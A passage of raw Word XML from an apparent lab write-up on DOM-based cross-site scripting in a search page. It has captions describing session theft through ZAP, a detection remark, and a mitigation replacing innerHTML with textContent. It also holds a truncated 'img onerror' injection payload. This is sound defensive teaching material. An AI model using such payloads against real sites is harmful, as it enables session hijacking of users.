          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="767D9339" wp14:editId="28A2E7F1">
            <wp:extent cx="5943600" cy="2331720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="107157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77040" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId10"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="2331720"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E708EA">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t>Fig 6 inside the newly opened browser by Zap insert the payload again</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="454F953A" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRPr="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="447AF997" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36A46C7E" w14:textId="77C358F0" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w14:ligatures w14:val="standardContextual"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1C37F16A" wp14:editId="69446F3D">
            <wp:extent cx="5943600" cy="4501515"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="19564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78452" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId11"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="4501515"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3723B3DE" w14:textId="726C2C29" w:rsidR="00E708EA" w:rsidRPr="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E708EA">
        <w:rPr>
          <w:color w:val="E97132" w:themeColor="accent2"/>
          <w:sz w:val="16"/>
          <w:szCs w:val="16"/>
        </w:rPr>
        <w:t xml:space="preserve">Fig 7 on History you can see the steal session </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FE7CE16" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D53292" w14:textId="3BDF4B77" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>This illustrates an important detection principle for DOM-based XSS : a web application firewall or server-side log review alone will not catch the initial injection, but monitoring traffic for unexpected request to unfamiliar hosts can catch the exfiltration stage of the attack.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A69B9BD" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="041AE0DF" w14:textId="70635B07" w:rsidR="00E708EA" w:rsidRPr="004D08E1" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004D08E1">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="156082" w:themeColor="accent1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>5 Mitigation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F2F634E" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AB72177" w14:textId="64EBE270" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The fix replaces the dangerous </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> sink with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>, which inserts the search term as literal text rather than parsing it as HTML. This removes the vulnerability at its root rather than attempting to filter malicious input, which is error-prone</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9350"/>
      </w:tblGrid>
      <w:tr w:rsidR="00E708EA" w14:paraId="3F3EF9A7" w14:textId="77777777" w:rsidTr="00E708EA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9350" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1DB94532" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>// mitigated.js</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67A04B8E" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">function </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>renderResults</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(term) {</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0B7F6FDD" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  const </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>resultsEl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('results');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="32F32CA1" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>resultsEl.innerHTML</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = '';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3603F0EF" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="503ECF80" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  const heading = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>document.createElement</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>('p');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="14AB30B4" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>heading.textContent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = 'Showing results for: ' + term;  // safe: not parsed as HTML</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="06781CA5" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>resultsEl.appendChild</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(heading);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="48EFA2B5" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2C41DF82" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  const count = </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>document.createElement</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>('p');</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="76284B53" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>count.textContent</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> = '0 products found.';</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02DEABD6" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>resultsEl.appendChild</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>(count);</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1F3E974C" w14:textId="3372EDCF" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00E708EA">
            <w:pPr>
              <w:rPr>
                <w:color w:val="000000" w:themeColor="text1"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t>}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4BEFB6FE" w14:textId="77777777" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="548EDD85" w14:textId="449BC4E2" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>The fixed code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039696C3" w14:textId="43F4A32F" w:rsidR="00E708EA" w:rsidRDefault="00E708EA" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>To explain it:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002A1F0E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>resultsEl.innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002A1F0E">
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ‘’ – this clears out whatever was shown before</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C3B0A4" w14:textId="77777777" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FF618DD" w14:textId="046AE714" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Document.createElement</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">(‘p’) – instead of building an HTML string and dumping it in, this creates an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>acutal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> empty &lt;p&gt; element directly, piece by piece</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF1A8A4" w14:textId="77777777" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="43A6FF8A" w14:textId="111277C3" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>heading.textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> = ‘Showing result for: ‘ + term – this is the key different. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> puts the text in as plain text only. Even if term contains something like &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>img</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> =x  </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>onerror</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> =…&gt;, the browser just displays those characters on screen exactly as typed, it never tries </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>ti</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> interpret them as HTML or un anything</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B08BDF" w14:textId="77777777" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4334C5BB" w14:textId="73AF0165" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>resultsEl.appendChild</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">(heading) – </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>attachess</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> that paragraph to the page</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67C94F3F" w14:textId="77777777" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53D27E5D" w14:textId="5BE2709D" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>Same pattern repeats for the “0 product found” line</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F19734E" w14:textId="77777777" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A86EF92" w14:textId="14EE534E" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="00F35EF5">
      <w:pPr>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve">The core fix in one sentence: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>innerHTML</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> says “parse this as HTML,” </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t>textContent</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
        </w:rPr>
        <w:t xml:space="preserve"> says “just show this as text” same visual result for normal search terms like “shoes”, but completely different (and safe) result when someone tries to inject code, because it never get a chance to be executed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B270851" w14:textId="77777777" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="002A1F0E">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D371D53" w14:textId="2146FB65" w:rsidR="002A1F0E" w:rsidRDefault="002A1F0E" w:rsidP="002A1F0E">
      <w:pPr>
        <w:spacing w:after="160"/>
      </w:pPr>
      <w:r>
        <w:t>A Content-Security-Policy (script-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>src</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
